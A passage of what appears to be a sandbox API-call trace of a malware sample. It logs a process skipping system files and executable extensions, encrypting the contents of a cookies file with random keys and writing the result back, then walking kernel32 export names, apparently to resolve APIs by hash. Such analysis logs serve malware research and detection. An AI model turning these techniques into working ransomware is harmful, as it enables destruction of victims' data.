(lpString1="index.dat", lpString2="boot.ini") returned 1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0181.068] lstrlenW (lpString="index.dat") returned 9 [0181.068] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0181.068] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0181.068] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0181.068] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0181.068] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0181.068] lstrlenW (lpString="index.dat") returned 9 [0181.068] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0181.068] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" [0181.068] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0181.069] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=32768) returned 1 [0181.069] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0181.069] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.069] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.069] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.069] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.070] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0181.070] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.071] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.072] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.072] CloseHandle (hObject=0x280) returned 1 [0181.072] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.072] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0181.073] CloseHandle (hObject=0x0) returned 0 [0181.073] CloseHandle (hObject=0x27c) returned 1 [0181.073] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.074] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.074] GetTickCount () returned 0x1134b43 [0181.074] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.074] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.074] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.074] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.075] lstrlenA (lpString="kernel32.dll") returned 12 [0181.075] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.075] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.075] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.075] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.075] lstrlenA (lpString="ADDATOMA") returned 8 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.075] lstrlenA (lpString="ADDATOMW") returned 8 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.075] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.075] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.075] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.075] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.075] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.075] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.075] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.075] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.075] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.075] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.076] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.076] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.076] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.076] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.076] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.076] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.076] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.076] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.076] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.076] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.076] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.076] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.076] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.076] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.076] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.076] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.076] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.076] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.076] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.077] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.077] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.077] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.077] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.077] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.077] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.077] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.077] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.077] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.077] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.077] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.077] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.077] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.077] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.077] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.077] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.077] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.077] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.077] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.077] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.078] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.078] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.078] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.078] lstrlenA (lpString="BEEP") returned 4 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.078] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.078] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.078] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.078] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.078] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.079] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.079] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.079] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.079] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.079] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.079] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.079] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.079] lstrlenA (lpString="CANCELIO") returned 8 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.079] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.079] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.079] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.079] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.079] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.079] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.079] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.079] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.079] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.079] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.079] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.080] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.080] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.080] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.080] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.080] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.080] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.080] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.080] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.080] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.080] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.080] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.080] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.080] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.080] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.080] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.080] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.080] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.080] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.080] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.080] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.081] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.081] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.081] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.081] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.081] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 